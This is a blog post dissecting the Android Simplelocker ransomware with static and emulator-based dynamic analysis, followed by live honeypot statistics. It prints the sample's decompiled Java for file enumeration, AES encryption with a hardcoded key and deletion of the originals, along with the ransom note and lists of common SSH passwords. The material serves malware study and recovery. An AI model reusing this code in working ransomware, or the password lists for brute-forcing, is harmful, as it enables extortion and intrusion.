Secure Honey

SSH honeypot written in C

How To Dissect Android Simplelocker Ransomware

Monday 16th June 2014 11:56

In this blog post we'll be looking at a new type of malware for Android phones that encrypts important files and demands the user pay a ransom to regain access to their phone.

This is the first reported case of ransomware being used on smartphones so I'm keen to find out more about this new malicious app.

I want to understand what this ransomware does and how it restricts the phone user from accessing files on their SD card. I'll be providing a step-by-step dissection of the malware to provide a clear explanation of how this app carries out its malicious activities.

So before we start the dissection let's look at exactly what Simplelocker is and where it came from.

What is Simplelocker?

First reported by Eset (ESET Analyzes First Android File-Encrypting, TOR-enabled Ransomware) on the 4th June 2014, Simplelocker has one goal: to encrypt certain files on the phone's SD card and then demand cash to decrypt the data - also known as ransomware.

Ransomware is a type of malware that "restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed" (see Wikipedia: Ransomware).

We've seen plenty of cases recently of ransomware infecting computer's (such as CryptoLocker and Cryptowall) but this appears to be the first case of smartphone ransomware in action.

Credit to the following articles for their explanation of the Simplelocker ransomware:

Simple Locker Ransomware Dissection

MD5: fd694cf5ca1dd4967ad6e8c67241114c
SHA256: 8a918c3aa53ccd89aaa102a235def5dcffa047e75097c1ded2dd2363bae7cf97
APK obtained from: contagiominidump.blogspot.in/2014/06/simplocker-android-file-encrypting-tor.html

This post will follow a similar form to the previous post How To Dissect Android Flappy Bird Malware, only I'll assume you've already installed the various tools required for dissection.

The tools I'll be using for this dissection are the same as the previous dissection:

For this dissection I'll still be using dynamic and static analysis, but the approach will be slightly different.

Due to the dangerous nature of ransomware it could be risky to carry out the dynamic analysis first, just in case the ransomware does something malicious to the computer. So I'll be carrying out a basic static analysis in order to determine what the app does and if it's safe to run in a virtual environment, before carrying out the dynamic analysis. I'll then return to the static analysis where we'll look at the code in greater detail and how it carries out the malicious activities.

Basic Static Analysis

The first task is to turn the APK file into a .jar file which we can then open in JD-GUI to see the Java code that's powering the ransomware.

Heading over to the console, we first want to use the tool dex2jar to convert the APK file into a .jar file. The following command should do the trick:

sh /home/user/dex2jar-version/d2j-dex2jar.sh /home/user/simplocker.apk

This should produce a .jar file which you can open in JD-GUI, producing something similar to the screenshot below:

Let's take a brief look at what this app is doing by exploring some of the class files:

In a nutshell this information tells us the following:

  1. This app is looking for images, documents and videos to encrypt. After encrypting the files it will then rename their file extensions to .enc
  2. The app has a C&C (command and control) server on the TOR network
  3. The app collects information about the phone (IMEI, OS, phone model, manufacturer) to send to C&C server
  4. Presumably the C&C server can send decryption instructions to the app

We now have a good overall picture of how this app carries out its ransomware activities. We can also determine that's it's reasonably safe to open this app in the virtual Android environment on DroidBox, so let's move onto the next phase.

Dynamic Analysis

In this phase we want to allow the app to run in a safe environment to confirm whether or not our suspicions from the basic static analysis phase are true.

The main tool we'll use for this phase is DroidDox (refer to the previous post, How To Dissect Android Flappy Bird Malware, for installation instructions)

We'll be working on the command line for this part. Also, remember to export the Android SDK path so we can work from any directory and still have access to the SDK tools:

export PATH=$PATH:/path/to/android-sdk/tools/
export PATH=$PATH:/path/to/android-sdk/platform-tools/

Make sure you have a virtual device setup and ready to deploy in the Android Virtual Device (AVD) manager by entering the command:

android

Heading over to the DroidBox directory, we can now start the Android emulator by entering the following command:

./startemu.sh <AVD name>

Which should open up the virtual Android device with the OS loading, as seen in the screenshot below:

The Android emulator might take a minute or two to fire-up. Once it's ready, enter the following into the command line. This will install Simplelocker onto the virtual device and run the app:

./droidbox.sh simplelocker.apk

Once the app has installed, the virtual Android screen should look like the screenshot below:

This screenshot is the Simplelocker lock screen presented to the user. The text translates from Russian as follows:

WARNING your phone is locked!

The device is locked for viewing and distribution child pornography , zoophilia and other perversions.

To unlock you need to pay 260 UAH.

1. Locate the nearest payment kiosk.

2. Select MoneXy

3. Enter 380982049193.

4. Make deposit of 260 Hryvnia, and then press pay.

Do not forget to take a receipt!

After payment your device will be unlocked within 24 hours.

In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!

Interestingly, the code to enter (in step 3) appears to be the same every time the app is executed.

Heading back to the command line, DroidBox should have produced an output similar to the screenshot below:

Go ahead and press Ctrl-C to to view the JSON log of data collected while the app was running.

This log shows the use of localhost 127.0.0.1 port 9051 being used for sending and receiving data, the app also accesses a lot of files.

This output didn't prove much because there's no SD card attached to the virtual Android device and therefore no files to encrypt. So let's carry out the experiment again, but this time with some files to be encrypted.

Head back to the AVD manager by entering the command Android on the command line. Open up the settings for the AVD being used for the experiment and enable the SD card with a size of 30 MiB.

The location of this SD card image should be ~/.android/avd//sdcard.img, so the virtual SD card can be mounted by using the following command

mount ~/.android/avd/sdcard.img -o loop /mnt/sdcard

At this point go ahead and copy onto the mounted virtual SD card some sample images ("jpeg", "jpg", "png", "bmp", "gif"), documents ("pdf", "doc", "docx", "txt") and videos ("avi", "mkv", "3gp", "mp4").

Once there are some sample files on the virtual SD card, unmount it by entering the following onto the command line:

umount /mnt/sdcard/

Now we're ready to fire up the AVD and run the app in DroidBox again:

./startemu.sh <AVD name>
./droidbox.sh simplelocker.apk

It might take the AVD a while to encrypt all the files, but after a few minutes stop the AVD and mount the virtual SD card again. All the sample files should have been encrypted and had their extensions renamed to .enc.

So at this point we can confirm that our basic static analysis turned out to be correct: this app encrypts images, documents and videos with pre-determined file extensions.

Static Analysis - Part Two

Having determined what this app does, let's find out how this app carries out its malicious activities by looking at its code in more detail.

The main function being carried out by this app is the file encryption which occurs in the classes FilesEncryptor and AesCrypt. The class FilesEncryptor contains a method called getFileNames():

private void getFileNames(File paramFile)
  {
    File[] arrayOfFile = paramFile.listFiles();
    int i = 0;
    if (i >= arrayOfFile.length)
      return;
    File localFile = new File(paramFile.getAbsolutePath(), arrayOfFile[i].getName());
    if ((localFile.isDirectory()) && (localFile.listFiles() != null))
      getFileNames(localFile);
    while (true)
    {
      i++;
      break;
      String str1 = localFile.getAbsolutePath();
      String str2 = str1.substring(1 + str1.lastIndexOf("."));
      if (this.extensionsToDecrypt.contains(str2))
      {
        this.filesToDecrypt.add(localFile.getAbsolutePath());
        continue;
      }
      if (!Constants.EXTENSIONS_TO_ENCRYPT.contains(str2))
        continue;
      this.filesToEncrypt.add(localFile.getAbsolutePath());
    }
  }

This code extract from the ransomware iterates through all files on the SD card. Line 15 calculates the file extension of each file on the SD card and then line 16 checks if the file extension is in the list of pre-determined file extensions to encrypt (found in the class Constants).

The same class also contains a method called encrypt():

  public void encrypt()
    throws Exception
  {
    AesCrypt localAesCrypt;
    Iterator localIterator;
    if ((!this.settings.getBoolean("FILES_WAS_ENCRYPTED", false)) && (isExternalStorageWritable()))
    {
      localAesCrypt = new AesCrypt("jndlasf074hr");
      localIterator = this.filesToEncrypt.iterator();
    }
    while (true)
    {
      if (!localIterator.hasNext())
      {
        Utils.putBooleanValue(this.settings, "FILES_WAS_ENCRYPTED", true);
        return;
      }
      String str = (String)localIterator.next();
      localAesCrypt.encrypt(str, str + ".enc");
      new File(str).delete();
    }
  }

This method iterates over all the files which were added to the array in the previous method (getFileNames()), as seen on line 9. Each file is encrypted on line 19 where a call is made to the encrypt() method of the AesCrypt class.

The encrypt() method from the AesCrypt class requires two parameters: name/location of file to be encrypted and name/location of the encrypted output file. Line 19 uses the name of the file (as determined by line 18) and then appends the extension .enc to the end of the file to write. Finally, line 20 deletes the original unencrypted file.

The class AesCrypt carries out the actual encryption and decryption of files. It's constructor method is shown below:

  public AesCrypt(String paramString)
    throws Exception
  {
    MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
    localMessageDigest.update(paramString.getBytes("UTF-8"));
    byte[] arrayOfByte = new byte[32];
    System.arraycopy(localMessageDigest.digest(), 0, arrayOfByte, 0, arrayOfByte.length);
    this.cipher = Cipher.getInstance("AES/CBC/PKCS7Padding");
    this.key = new SecretKeySpec(arrayOfByte, "AES");
    this.spec = getIV();
  }

This code snipped shows that the ransomware uses AES encryption using AES/CBC/PKCS7Padding.

The AesCrypt class contains a method called crypt() (as called earlier in FilesEncryptor's encrypt() method), this method is shown below:

  public void encrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(1, this.key, this.spec);
    CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localFileInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localCipherOutputStream.flush();
        localCipherOutputStream.close();
        localFileInputStream.close();
        return;
      }
      localCipherOutputStream.write(arrayOfByte, 0, i);
    }
  }

This is where the file encryption takes places within the app. Lines 4 and 5 create variables used for the file input and output. Line 6 initialises the cipher (to encrypt data). Line 7 is where the encryption occurs and line 19 writes the encrypted byes to the output file.

Interestingly the same class also contains a method called decrypt() which is very similar to the encrypt() method:

  public void decrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(2, this.key, this.spec);
    CipherInputStream localCipherInputStream = new CipherInputStream(localFileInputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localCipherInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localFileOutputStream.flush();
        localFileOutputStream.close();
        localCipherInputStream.close();
        return;
      }
      localFileOutputStream.write(arrayOfByte, 0, i);
    }
  }

Obviously this method carries out the decryption on the input file and produces the decrypted output file. The same line numbers from the encrypt() method are highlighted to demonstrate how decryption occurs.

Conclusion

As previously noted by other write-ups about this ransomware: this is more of a proof-of-concept app at the moment and it has yet to be discovered on the Google Play Store. The app is also quite simple to reverse-engineer and no code obfuscation has been used.

This dissection shows how the app encrypts user's files and that information about the phone is sent to a C&C server on the TOR network.

But one important question remains unanswered: would it be possible to decrypt files that have been encrypted by the app without connecting to the C&C server? In other words: can we reverse the damage done by this app?

In the next blog post we'll look at how you can create an antidote for this ransomware.

Edit: as promised, a complete walkthrough on creating the antidote for Simplelocker (which will decrypt the files) is available in the blog post Creating An Antidote For Android Simplelocker Ransomware.

Image credit: "Google Android Amigurumi" by Kham Tran, flickr.com/photos/khamtran/5871541424/.

Comments

Rod

Tue, 17 Jun 2014 02:34:49 +0100

Awesome work!

Roshin

Tue, 17 Jun 2014 12:41:10 +0100

damn! awesome work dude! I've never read such a detailed explanation anywhere! keep up the good work! looking forward to more articles!

Alex

Fri, 20 Jun 2014 13:34:39 +0100

I wrote decoder at 9 June =) LOL for Russia

Add Comment

Name

Email (won't be displayed)

Website (optional)

Comments

Live Stats (see full stats)

Attempted logins

date range # attempts
today346
yesterday8,147
past 7 days28,033
past 30 days378,958
all time2,900,198

Top 5 passwords

password # attempts
-5,843
1234565,609
6666663,156
admin2,834
zxcvbnm2,470

Top 5 usernames

username # attempts
root2,845,992
admin13,423
bin1,847
oracle1,559
toot1,440

Stats represent data collected from SSH login attempts on multiple honeypots. Parts of some stats may be filtered to maintain anonymity.

Updated: Thu, 02 Oct 2014 07:01:33 +0100

Live Password Cloud

qwer1234 asdfgh onlyidc hellO p0o9i8u7 123321 server adminis asdf 123qwe 1qaz@WSX 1234qwer edong asdfg qwaszx 778899 qwert 1234 sqlpp qwer 0000 1q2w3e4r5t 111 1q2w3e 963852741 mnbvcxz sasa caonima 111222 idc123 1230 root secret qaz aaaaaa 1QA2WS3ED 1qaz2wsx3edc Aa123456 idc idc2654321 - administrator 987654 _ zaq1xsw2 7890 1q2w3e4r 147258 chinaidc qazxsw qwertyu iloveyou 888888 1234567 111111 qwe qazqaz password123 abcd1234 zaqxswcde master webserver 123123123 888999 123qweasd abc123 sa qq123456 user zhang power 54321 789789 321 wang password1 !@#$%^ 000000 112233 789456 sql 666666 zaqwsx pass zxcvbnm 987654321 server2000 admin1 idccom 1qazxsw2 336699 147258369 123123 654321 1 qwe123 idcidc shanghai zxcvb china guest qq 123654 rewq qwertyuiop 5201314 backup 12345 sa890pp 121212 23456 !QAZ@WSX 1qaz2wsx 159753 changeme access f**kyou 7890pp zxcv asdfghjkl admin 1234567890 admin123 12345678 11223344 P@ssw0rd 123abc 1314520 qazwsxedc zaqxsw qwerasdf 1p203948576 zaq12wsx 0123456789 idc2008 1111 topidc a123456 123456qwerty idc2007 56789 server2003 zitian 123 11111111 woaini sapp 999999 1q1q1q windows 258258 qwerty test 88888888 12p30495867 hacker adminpp scott 123456789 q1w2e3 q1w2e3r4t5 123456 qwertyuio welcome qqpp test123 system 123qweasdzxc zxcvbn password q1w2e3r4 qazwsx